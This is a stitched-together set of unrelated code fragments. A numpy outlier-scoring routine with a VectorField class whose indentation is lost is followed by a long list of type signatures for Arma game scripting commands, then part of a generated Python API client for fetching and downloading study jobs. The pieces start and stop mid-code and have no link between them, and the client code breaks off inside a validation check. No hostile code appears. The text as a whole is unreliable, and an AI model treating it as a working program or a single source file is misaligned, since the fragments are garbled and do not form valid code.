    outlier_score = (2 * np.pi * sigma2) ** (D / 2) * (1 - gamma) / (gamma * a)
    # Replace exact zeros with the smallest nonzero score so the ratio below
    # stays well-defined.
    inlier_score[inlier_score == 0] = np.min(inlier_score[inlier_score != 0])
    P = inlier_score / (inlier_score + outlier_score)
    E = P.T.dot(residual2) / (2 * sigma2) + np.sum(P) * np.log(sigma2) * D / 2
    return P, E
class VectorField:
def __init__(self, X, V, Grid, M=100, a=5, beta=0.1, ecr=1e-5, gamma=0.9, lambda_=3, minP=1e-5, MaxIter=500, theta=0.75, div_cur_free_kernels=False):
"""Initialize the VectorField class.
Parameters
----------
X: 'np.ndarray' (dimension: n_obs x n_features)
Original data.
V: 'np.ndarray' | |
Anything),
BinaryExpression(Group, Keyword('deletegroupwhenempty'), Boolean, Nothing),
BinaryExpression(Array, Keyword('deleterange'), Array, Nothing),
BinaryExpression(TeamMember, Keyword('deleteresources'), Array, Nothing),
BinaryExpression(Object, Keyword('deletevehiclecrew'), Object, Nothing),
BinaryExpression(Object, Keyword('diarysubjectexists'), String, Boolean),
BinaryExpression(Object, Keyword('directsay'), String, Nothing),
BinaryExpression(Object, Keyword('disableai'), String, Nothing),
BinaryExpression(Object, Keyword('disablecollisionwith'), Object, Nothing),
BinaryExpression(Object, Keyword('disableconversation'), Boolean, Nothing),
BinaryExpression(Object, Keyword('disablenvgequipment'), Boolean, Nothing),
BinaryExpression(Object, Keyword('disabletiequipment'), Boolean, Nothing),
BinaryExpression(Object, Keyword('disableuavconnectability'), Array, Nothing),
BinaryExpression(Display, Keyword('displayaddeventhandler'), Array, Number),
BinaryExpression(Display, Keyword('displayctrl'), Number, Control),
BinaryExpression(Display, Keyword('displayremovealleventhandlers'), String, Nothing),
BinaryExpression(Display, Keyword('displayremoveeventhandler'), Array, Nothing),
BinaryExpression(Display, Keyword('displayseteventhandler'), Array, Nothing),
BinaryExpression(Object, Keyword('distance'), Object, Number),
BinaryExpression(Object, Keyword('distance'), Array, Number),
BinaryExpression(Array, Keyword('distance'), Object, Number),
BinaryExpression(Array, Keyword('distance'), Array, Number),
BinaryExpression(Location, Keyword('distance'), Location, Number),
BinaryExpression(Location, Keyword('distance'), Array, Number),
BinaryExpression(Array, Keyword('distance'), Location, Number),
BinaryExpression(Object, Keyword('distance2d'), Object, Number),
BinaryExpression(Object, Keyword('distance2d'), Array, Number),
BinaryExpression(Array, Keyword('distance2d'), Object, Number),
BinaryExpression(Array, Keyword('distance2d'), Array, Number),
BinaryExpression(Object, Keyword('distancesqr'), Object, Number),
BinaryExpression(Object, Keyword('distancesqr'), Array, Number),
BinaryExpression(Array, Keyword('distancesqr'), Object, Number),
BinaryExpression(Array, Keyword('distancesqr'), Array, Number),
BinaryExpression(Location, Keyword('distancesqr'), Location, Number),
BinaryExpression(Location, Keyword('distancesqr'), Array, Number),
BinaryExpression(Array, Keyword('distancesqr'), Location, Number),
BinaryExpression(WhileType, Keyword('do'), Code, Nothing),
BinaryExpression(WithType, Keyword('do'), Code, Nothing),
BinaryExpression(ForType, Keyword('do'), Code, Anything),
BinaryExpression(SwitchType, Keyword('do'), Code, Anything),
BinaryExpression(Object, Keyword('doartilleryfire'), Array, Nothing),
BinaryExpression(Array, Keyword('doartilleryfire'), Array, Nothing),
BinaryExpression(Object, Keyword('dofire'), Object, Nothing),
BinaryExpression(Array, Keyword('dofire'), Object, Nothing),
BinaryExpression(Object, Keyword('dofollow'), Object, Nothing),
BinaryExpression(Array, Keyword('dofollow'), Object, Nothing),
BinaryExpression(Object, Keyword('dofsm'), Array, Nothing),
BinaryExpression(Array, Keyword('dofsm'), Array, Nothing),
BinaryExpression(Object, Keyword('domove'), Array, Nothing),
BinaryExpression(Array, Keyword('domove'), Array, Nothing),
BinaryExpression(Object, Keyword('doorphase'), String, Number),
BinaryExpression(Object, Keyword('dosuppressivefire'), Object, Nothing),
BinaryExpression(Object, Keyword('dosuppressivefire'), Array, Nothing),
BinaryExpression(Array, Keyword('dosuppressivefire'), Object, Nothing),
BinaryExpression(Array, Keyword('dosuppressivefire'), Array, Nothing),
BinaryExpression(Object, Keyword('dotarget'), Object, Nothing),
BinaryExpression(Array, Keyword('dotarget'), Object, Nothing),
BinaryExpression(Object, Keyword('dowatch'), Array, Nothing),
BinaryExpression(Array, Keyword('dowatch'), Array, Nothing),
BinaryExpression(Object, Keyword('dowatch'), Object, Nothing),
BinaryExpression(Array, Keyword('dowatch'), Object, Nothing),
BinaryExpression(Control, Keyword('drawarrow'), Array, Nothing),
BinaryExpression(Control, Keyword('drawellipse'), Array, Nothing),
BinaryExpression(Control, Keyword('drawicon'), Array, Nothing),
BinaryExpression(Control, Keyword('drawline'), Array, Nothing),
BinaryExpression(Control, Keyword('drawlink'), Array, Nothing),
BinaryExpression(Control, Keyword('drawlocation'), Location, Nothing),
BinaryExpression(Control, Keyword('drawpolygon'), Array, Nothing),
BinaryExpression(Control, Keyword('drawrectangle'), Array, Nothing),
BinaryExpression(Control, Keyword('drawtriangle'), Array, Nothing),
BinaryExpression(Control, Keyword('editobject'), String, Anything),
BinaryExpression(Control, Keyword('editorseteventhandler'), Array, Nothing),
BinaryExpression(Code, Keyword('else'), Code, Array),
BinaryExpression(Object, Keyword('emptypositions'), String, Number),
BinaryExpression(Object, Keyword('enableai'), String, Nothing),
BinaryExpression(String, Keyword('enableaifeature'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableaimprecision'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableattack'), Boolean, Nothing),
BinaryExpression(Group, Keyword('enableattack'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableautostartuprtd'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableautotrimrtd'), Boolean, Boolean),
BinaryExpression(Number, Keyword('enablechannel'), Boolean, Nothing),
BinaryExpression(Number, Keyword('enablechannel'), Array, Nothing),
BinaryExpression(Object, Keyword('enablecollisionwith'), Object, Nothing),
BinaryExpression(Object, Keyword('enablecopilot'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enabledynamicsimulation'), Boolean, Nothing),
BinaryExpression(Group, Keyword('enabledynamicsimulation'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablefatigue'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablegunlights'), String, Nothing),
BinaryExpression(Group, Keyword('enablegunlights'), String, Nothing),
BinaryExpression(Object, Keyword('enableinfopanelcomponent'), Array, Boolean),
BinaryExpression(Array, Keyword('enableinfopanelcomponent'), Array, Boolean),
BinaryExpression(Object, Keyword('enableirlasers'), Boolean, Nothing),
BinaryExpression(Group, Keyword('enableirlasers'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablemimics'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablepersonturret'), Array, Nothing),
BinaryExpression(Object, Keyword('enablereload'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableropeattach'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablesimulation'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablesimulationglobal'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablestamina'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableuavconnectability'), Array, Nothing),
BinaryExpression(Object, Keyword('enableuavwaypoints'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablevehiclecargo'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablevehiclesensor'), Array, Nothing),
BinaryExpression(Object, Keyword('enableweapondisassembly'), Boolean, Nothing),
BinaryExpression(Object, Keyword('engineon'), Boolean, Nothing),
BinaryExpression(Control, Keyword('evalobjectargument'), Array, Anything),
BinaryExpression(Type, Keyword('exec'), String, Nothing),
BinaryExpression(Control, Keyword('execeditorscript'), Array, Anything),
BinaryExpression(Type, Keyword('execfsm'), String, Number),
BinaryExpression(Type, Keyword('execvm'), String, Script),
BinaryExpression(IfType, Keyword('exitwith'), Code, Anything),
BinaryExpression(Number, Keyword('fademusic'), Number, Nothing),
BinaryExpression(Number, Keyword('faderadio'), Number, Nothing),
BinaryExpression(Number, Keyword('fadesound'), Number, Nothing),
BinaryExpression(Number, Keyword('fadespeech'), Number, Nothing),
BinaryExpression(Array, Keyword('find'), Type, Number),
BinaryExpression(String, Keyword('find'), String, Number),
BinaryExpression(Object, Keyword('findcover'), Array, Object),
BinaryExpression(Control, Keyword('findeditorobject'), Array, String),
BinaryExpression(Control, Keyword('findeditorobject'), Type, String),
BinaryExpression(Array, Keyword('findemptyposition'), Array, Array),
BinaryExpression(Array, Keyword('findemptypositionready'), Array, Boolean),
BinaryExpression(Array, Keyword('findif'), Code, Number),
BinaryExpression(Object, Keyword('findnearestenemy'), Object, Object),
BinaryExpression(Object, Keyword('findnearestenemy'), Array, Object),
BinaryExpression(Object, Keyword('fire'), String, Nothing),
BinaryExpression(Object, Keyword('fire'), Array, Nothing),
BinaryExpression(Object, Keyword('fireattarget'), Array, Boolean),
BinaryExpression(Object, Keyword('flyinheight'), Number, Nothing),
BinaryExpression(Object, Keyword('flyinheightasl'), Array, Nothing),
BinaryExpression(Object, Keyword('forceadduniform'), String, Nothing),
BinaryExpression(Object, Keyword('forceflagtexture'), String, Nothing),
BinaryExpression(Object, Keyword('forcefollowroad'), Boolean, Nothing),
BinaryExpression(Object, Keyword('forcespeed'), Number, Nothing),
BinaryExpression(Object, Keyword('forcewalk'), Boolean, Nothing),
BinaryExpression(Object, Keyword('forceweaponfire'), Array, Nothing),
BinaryExpression(Code, Keyword('foreach'), Array, Nothing),
BinaryExpression(Code, Keyword('foreachmember'), TeamMember, Nothing),
BinaryExpression(Code, Keyword('foreachmemberagent'), TeamMember, Nothing),
BinaryExpression(Code, Keyword('foreachmemberteam'), TeamMember, Nothing),
BinaryExpression(Object, Keyword('forgettarget'), Object, Nothing),
BinaryExpression(Group, Keyword('forgettarget'), Object, Nothing),
BinaryExpression(ForType, Keyword('from'), Number, ForType),
BinaryExpression(Object, Keyword('get3denattribute'), String, Array),
BinaryExpression(Group, Keyword('get3denattribute'), String, Array),
BinaryExpression(Array, Keyword('get3denattribute'), String, Array),
BinaryExpression(String, Keyword('get3denattribute'), String, Array),
BinaryExpression(Number, Keyword('get3denattribute'), String, Array),
BinaryExpression(String, Keyword('get3denmissionattribute'), String, Anything),
BinaryExpression(Object, Keyword('getartilleryeta'), Array, Number),
BinaryExpression(Object, Keyword('getcargoindex'), Object, Number),
BinaryExpression(Object, Keyword('getcompatiblepylonmagazines'), String, Array),
BinaryExpression(Object, Keyword('getcompatiblepylonmagazines'), Number, Array),
BinaryExpression(String, Keyword('getcompatiblepylonmagazines'), String, Array),
BinaryExpression(String, Keyword('getcompatiblepylonmagazines'), Number, Array),
BinaryExpression(Object, Keyword('getdir'), Object, Number),
BinaryExpression(Object, Keyword('getdir'), Array, Number),
BinaryExpression(Array, Keyword('getdir'), Object, Number),
BinaryExpression(Array, Keyword('getdir'), Array, Number),
BinaryExpression(Control, Keyword('geteditorobjectscope'), String, String),
BinaryExpression(Array, Keyword('getenvsoundcontroller'), String, Number),
BinaryExpression(Side, Keyword('getfriend'), Side, Number),
BinaryExpression(Number, Keyword('getfsmvariable'), String, Anything),
BinaryExpression(Number, Keyword('getfsmvariable'), Array, Anything),
BinaryExpression(Group, Keyword('getgroupicon'), Number, Array),
BinaryExpression(Object, Keyword('gethidefrom'), Object, Array),
BinaryExpression(Object, Keyword('gethit'), String, Number),
BinaryExpression(Object, Keyword('gethitindex'), Number, Number),
BinaryExpression(Object, Keyword('gethitpointdamage'), String, Number),
BinaryExpression(Control, Keyword('getobjectargument'), Array, String),
BinaryExpression(Control, Keyword('getobjectchildren'), String, Array),
BinaryExpression(Control, Keyword('getobjectproxy'), String, Object),
BinaryExpression(Object, Keyword('getpos'), Array, Array),
BinaryExpression(Array, Keyword('getpos'), Array, Array),
BinaryExpression(Object, Keyword('getreldir'), Object, Number),
BinaryExpression(Object, Keyword('getreldir'), Array, Number),
BinaryExpression(Object, Keyword('getrelpos'), Array, Array),
BinaryExpression(Object, Keyword('getsoundcontroller'), String, Number),
BinaryExpression(Object, Keyword('getsoundcontrollerresult'), Config, Number),
BinaryExpression(Object, Keyword('getspeed'), String, Number),
BinaryExpression(Object, Keyword('getunittrait'), String, Anything),
BinaryExpression(Display, Keyword('getvariable'), String, Anything),
BinaryExpression(Display, Keyword('getvariable'), Array, Anything),
BinaryExpression(Control, Keyword('getvariable'), String, Anything),
BinaryExpression(Control, Keyword('getvariable'), Array, Anything),
BinaryExpression(Object, Keyword('getvariable'), String, Anything),
BinaryExpression(Object, Keyword('getvariable'), Array, Anything),
BinaryExpression(Group, Keyword('getvariable'), String, Anything),
BinaryExpression(Group, Keyword('getvariable'), Array, Anything),
BinaryExpression(Namespace, Keyword('getvariable'), String, Anything),
BinaryExpression(Namespace, Keyword('getvariable'), Array, Anything),
BinaryExpression(TeamMember, Keyword('getvariable'), String, Anything),
BinaryExpression(TeamMember, Keyword('getvariable'), Array, Anything),
BinaryExpression(Task, Keyword('getvariable'), String, Anything),
BinaryExpression(Task, Keyword('getvariable'), Array, Anything),
BinaryExpression(Location, Keyword('getvariable'), String, Anything),
BinaryExpression(Location, Keyword('getvariable'), Array, Anything),
BinaryExpression(Object, Keyword('glanceat'), Object, Nothing),
BinaryExpression(Object, Keyword('glanceat'), Array, Nothing),
BinaryExpression(Array, Keyword('glanceat'), Object, Nothing),
BinaryExpression(Array, Keyword('glanceat'), Array, Nothing),
BinaryExpression(Object, Keyword('globalchat'), String, Nothing),
BinaryExpression(Object, Keyword('globalradio'), String, Nothing),
BinaryExpression(Object, Keyword('groupchat'), String, Nothing),
BinaryExpression(Object, Keyword('groupradio'), String, Nothing),
BinaryExpression(Object, Keyword('groupselectunit'), Array, Nothing),
BinaryExpression(Object, Keyword('hasweapon'), String, Boolean),
BinaryExpression(Object, Keyword('hcgroupparams'), Group, Array),
BinaryExpression(Object, Keyword('hcremovegroup'), Group, Nothing),
BinaryExpression(Object, Keyword('hcselectgroup'), Array, Nothing),
BinaryExpression(Object, Keyword('hcsetgroup'), Array, Nothing),
BinaryExpression(Object, Keyword('hideobject'), Boolean, Nothing),
BinaryExpression(Object, Keyword('hideobjectglobal'), Boolean, Nothing),
BinaryExpression(Object, Keyword('hideselection'), Array, Nothing),
BinaryExpression(String, Keyword('hintc'), String, Nothing),
BinaryExpression(String, Keyword('hintc'), String, Nothing),
BinaryExpression(String, Keyword('hintc'), Array, Nothing),
BinaryExpression(Control, Keyword('htmlload'), String, Nothing),
BinaryExpression(Type, Keyword('in'), Array, Boolean),
BinaryExpression(Object, Keyword('in'), Object, Boolean),
BinaryExpression(Array, Keyword('in'), Location, Boolean),
BinaryExpression(Object, Keyword('inarea'), Object, Boolean),
BinaryExpression(Array, Keyword('inarea'), Object, Boolean),
BinaryExpression(Object, Keyword('inarea'), String, Boolean),
BinaryExpression(Array, Keyword('inarea'), String, Boolean),
BinaryExpression(Object, Keyword('inarea'), Array, Boolean),
BinaryExpression(Array, Keyword('inarea'), Array, Boolean),
BinaryExpression(Object, Keyword('inarea'), Location, Boolean),
BinaryExpression(Array, Keyword('inarea'), Location, Boolean),
BinaryExpression(Array, Keyword('inareaarray'), Object, Array),
BinaryExpression(Array, Keyword('inareaarray'), String, Array),
BinaryExpression(Array, Keyword('inareaarray'), Array, Array),
BinaryExpression(Array, Keyword('inareaarray'), Location, Array),
BinaryExpression(Object, Keyword('inflame'), Boolean, Nothing),
BinaryExpression(Object, Keyword('infopanelcomponentenabled'), Array, Boolean),
BinaryExpression(Array, Keyword('infopanelcomponentenabled'), Array, Boolean),
BinaryExpression(Object, Keyword('infopanelcomponents'), String, Array),
BinaryExpression(Array, Keyword('infopanelcomponents'), String, Array),
BinaryExpression(Array, Keyword('inpolygon'), Array, Boolean),
BinaryExpression(Array, Keyword('inrangeofartillery'), Array, Boolean),
BinaryExpression(Control, Keyword('inserteditorobject'), Array, String),
BinaryExpression(Array, Keyword('intersect'), Array, Array),
BinaryExpression(Type, Keyword('isequalto'), Type, Boolean),
BinaryExpression(Type, Keyword('isequaltype'), Type, Boolean),
BinaryExpression(Array, Keyword('isequaltypeall'), Type, Boolean),
BinaryExpression(Type, Keyword('isequaltypeany'), Array, Boolean),
BinaryExpression(Array, Keyword('isequaltypearray'), Array, Boolean),
BinaryExpression(Type, Keyword('isequaltypeparams'), Array, Boolean),
BinaryExpression(Object, Keyword('isflashlighton'), String, Boolean),
BinaryExpression(Array, Keyword('isflatempty'), Array, Array),
BinaryExpression(Object, Keyword('isirlaseron'), String, Boolean),
BinaryExpression(String, Keyword('iskindof'), String, Boolean),
BinaryExpression(String, Keyword('iskindof'), Array, Boolean),
BinaryExpression(Object, Keyword('iskindof'), String, Boolean),
BinaryExpression(Object, Keyword('issensortargetconfirmed'), Side, Boolean),
BinaryExpression(Object, Keyword('isuavconnectable'), Array, Boolean),
BinaryExpression(Object, Keyword('isuniformallowed'), String, Boolean),
BinaryExpression(Object, Keyword('isvehiclesensorenabled'), String, Array),
BinaryExpression(Array, Keyword('join'), Object, Nothing),
BinaryExpression(Array, Keyword('join'), Group, Nothing),
BinaryExpression(Object, Keyword('joinas'), Array, Nothing),
BinaryExpression(Object, Keyword('joinassilent'), Array, Nothing),
BinaryExpression(Array, Keyword('joinsilent'), Object, Nothing),
BinaryExpression(Array, Keyword('joinsilent'), Group, Nothing),
BinaryExpression(Array, Keyword('joinstring'), String, String),
BinaryExpression(Object, Keyword('kbadddatabase'), String, Boolean),
BinaryExpression(Object, Keyword('kbadddatabasetargets'), String, Boolean),
BinaryExpression(Object, Keyword('kbaddtopic'), Array, Nothing),
BinaryExpression(Object, Keyword('kbhastopic'), String, Boolean),
BinaryExpression(Object, Keyword('kbreact'), Array, Nothing),
BinaryExpression(Object, Keyword('kbremovetopic'), String, Nothing),
BinaryExpression(Object, Keyword('kbtell'), Array, Nothing),
BinaryExpression(Object, Keyword('kbwassaid'), Array, Boolean),
BinaryExpression(Object, Keyword('knowsabout'), Object, Number),
BinaryExpression(Group, Keyword('knowsabout'), Object, Number),
BinaryExpression(Side, Keyword('knowsabout'), Object, Number),
BinaryExpression(Object, Keyword('land'), String, Nothing),
BinaryExpression(Object, Keyword('landat'), Object, Nothing),
BinaryExpression(Object, Keyword('landat'), Number, Nothing),
BinaryExpression(Control, Keyword('lbadd'), String, Number),
BinaryExpression(Control, Keyword('lbcolor'), Number, Array),
BinaryExpression(Control, Keyword('lbcolorright'), Number, Array),
BinaryExpression(Control, Keyword('lbdata'), Number, String),
BinaryExpression(Control, Keyword('lbdelete'), Number, Nothing),
BinaryExpression(Control, Keyword('lbisselected'), Number, Boolean),
BinaryExpression(Control, Keyword('lbpicture'), Number, String),
BinaryExpression(Control, Keyword('lbpictureright'), Number, String),
BinaryExpression(Control, Keyword('lbsetcolor'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetcolorright'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetcursel'), Number, Nothing),
BinaryExpression(Control, Keyword('lbsetdata'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicture'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturecolor'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturecolordisabled'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturecolorselected'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpictureright'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturerightcolor'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturerightcolordisabled'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturerightcolorselected'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetselectcolor'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetselectcolorright'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetselected'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsettext'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsettextright'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsettooltip'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetvalue'), Array, Nothing),
BinaryExpression(Control, Keyword('lbtext'), Number, String),
BinaryExpression(Control, Keyword('lbtextright'), Number, String),
BinaryExpression(Control, Keyword('lbvalue'), Number, Number),
BinaryExpression(Object, Keyword('leavevehicle'), Object, Nothing),
BinaryExpression(Group, Keyword('leavevehicle'), Object, Nothing),
BinaryExpression(Object, Keyword('lightattachobject'), Array, Nothing),
BinaryExpression(Object, Keyword('limitspeed'), Number, Nothing),
BinaryExpression(Object, Keyword('linkitem'), String, Nothing),
BinaryExpression(Control, Keyword('listobjects'), String, Array),
BinaryExpression(Control, Keyword('lnbaddcolumn'), Number, Number),
BinaryExpression(Control, Keyword('lnbaddrow'), Array, Number),
BinaryExpression(Control, Keyword('lnbcolor'), Array, Array),
BinaryExpression(Control, Keyword('lnbcolorright'), Array, | |
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.study_get_study_job_deprecated_with_http_info(tenant_id, user_id, study_id, job_id, **kwargs) # noqa: E501
def study_get_study_job_deprecated_with_http_info(self, tenant_id, user_id, study_id, job_id, **kwargs):  # noqa: E501
    """study_get_study_job_deprecated  # noqa: E501

    Fetch a single job of a study (deprecated, user-scoped variant),
    returning the full HTTP response information.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.study_get_study_job_deprecated_with_http_info(tenant_id, user_id, study_id, job_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str tenant_id: (required)
    :param str user_id: (required)
    :param str study_id: (required)
    :param str job_id: (required)
    :param str sim_version:
    :param _return_http_data_only: return the response data only, without
                                   status code and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(GetStudyJobQueryResult, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() captures the named arguments plus the raw **kwargs dict;
    # the kwargs entries are validated and merged in below.
    local_var_params = locals()

    # Parameter names this endpoint accepts (path + query)...
    all_params = [
        'tenant_id',
        'user_id',
        'study_id',
        'job_id',
        'sim_version'
    ]
    # ...plus the generic request-control options shared by every endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unknown keyword arguments early, then flatten kwargs into
    # local_var_params so every parameter is looked up uniformly below.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method study_get_study_job_deprecated" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'tenant_id' is set
    if self.api_client.client_side_validation and ('tenant_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['tenant_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `tenant_id` when calling `study_get_study_job_deprecated`")  # noqa: E501
    # verify the required parameter 'user_id' is set
    if self.api_client.client_side_validation and ('user_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['user_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `user_id` when calling `study_get_study_job_deprecated`")  # noqa: E501
    # verify the required parameter 'study_id' is set
    if self.api_client.client_side_validation and ('study_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['study_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `study_id` when calling `study_get_study_job_deprecated`")  # noqa: E501
    # verify the required parameter 'job_id' is set
    if self.api_client.client_side_validation and ('job_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['job_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `job_id` when calling `study_get_study_job_deprecated`")  # noqa: E501

    collection_formats = {}

    # Map snake_case locals onto the camelCase placeholders of the URL
    # template used in the call_api() invocation below.
    path_params = {}
    if 'tenant_id' in local_var_params:
        path_params['tenantId'] = local_var_params['tenant_id']  # noqa: E501
    if 'user_id' in local_var_params:
        path_params['userId'] = local_var_params['user_id']  # noqa: E501
    if 'study_id' in local_var_params:
        path_params['studyId'] = local_var_params['study_id']  # noqa: E501
    if 'job_id' in local_var_params:
        path_params['jobId'] = local_var_params['job_id']  # noqa: E501

    # Only send the optional simVersion query parameter when supplied.
    query_params = []
    if 'sim_version' in local_var_params and local_var_params['sim_version'] is not None:  # noqa: E501
        query_params.append(('simVersion', local_var_params['sim_version']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json', 'text/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    return self.api_client.call_api(
        '/studies/{tenantId}/{userId}/{studyId}/jobs/{jobId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GetStudyJobQueryResult',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def study_get_study_job_download(self, tenant_id, study_id, job_id, access_signature, expiry, **kwargs):  # noqa: E501
    """study_get_study_job_download  # noqa: E501

    Convenience wrapper around
    study_get_study_job_download_with_http_info that returns only the
    response payload instead of the (data, status, headers) tuple.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.study_get_study_job_download(tenant_id, study_id, job_id, access_signature, expiry, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str tenant_id: (required)
    :param str study_id: (required)
    :param str job_id: (required)
    :param str access_signature: (required)
    :param str expiry: (required)
    :param str file_name:
    :param bool channels_as_csv:
    :param str sim_type_channels:
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper always want just the payload.
    kwargs = dict(kwargs, _return_http_data_only=True)
    return self.study_get_study_job_download_with_http_info(
        tenant_id, study_id, job_id, access_signature, expiry, **kwargs)  # noqa: E501
def study_get_study_job_download_with_http_info(self, tenant_id, study_id, job_id, access_signature, expiry, **kwargs):  # noqa: E501
    """study_get_study_job_download  # noqa: E501

    Download artifacts for a single study job, returning the full HTTP
    response information.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.study_get_study_job_download_with_http_info(tenant_id, study_id, job_id, access_signature, expiry, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str tenant_id: (required)
    :param str study_id: (required)
    :param str job_id: (required)
    :param str access_signature: (required)
    :param str expiry: (required)
    :param str file_name:
    :param bool channels_as_csv:
    :param str sim_type_channels:
    :param _return_http_data_only: return the response data only, without
                                   status code and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(object, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() captures the named arguments plus the raw **kwargs dict;
    # the kwargs entries are validated and merged in below.
    local_var_params = locals()

    # Parameter names this endpoint accepts (path + query)...
    all_params = [
        'tenant_id',
        'study_id',
        'job_id',
        'access_signature',
        'expiry',
        'file_name',
        'channels_as_csv',
        'sim_type_channels'
    ]
    # ...plus the generic request-control options shared by every endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unknown keyword arguments early, then flatten kwargs into
    # local_var_params so every parameter is looked up uniformly below.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method study_get_study_job_download" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'tenant_id' is set
    if self.api_client.client_side_validation and ('tenant_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['tenant_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `tenant_id` when calling `study_get_study_job_download`")  # noqa: E501
    # verify the required parameter 'study_id' is set
    if self.api_client.client_side_validation and ('study_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['study_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `study_id` when calling `study_get_study_job_download`")  # noqa: E501
    # verify the required parameter 'job_id' is set
    if self.api_client.client_side_validation and ('job_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['job_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `job_id` when calling `study_get_study_job_download`")  # noqa: E501
    # verify the required parameter 'access_signature' is set
    if self.api_client.client_side_validation and ('access_signature' not in local_var_params or  # noqa: E501
                                                   local_var_params['access_signature'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `access_signature` when calling `study_get_study_job_download`")  # noqa: E501
    # verify the required parameter 'expiry' is set
    if self.api_client.client_side_validation and ('expiry' not in local_var_params or  # noqa: E501
                                                   local_var_params['expiry'] is None):  # noqa: E501
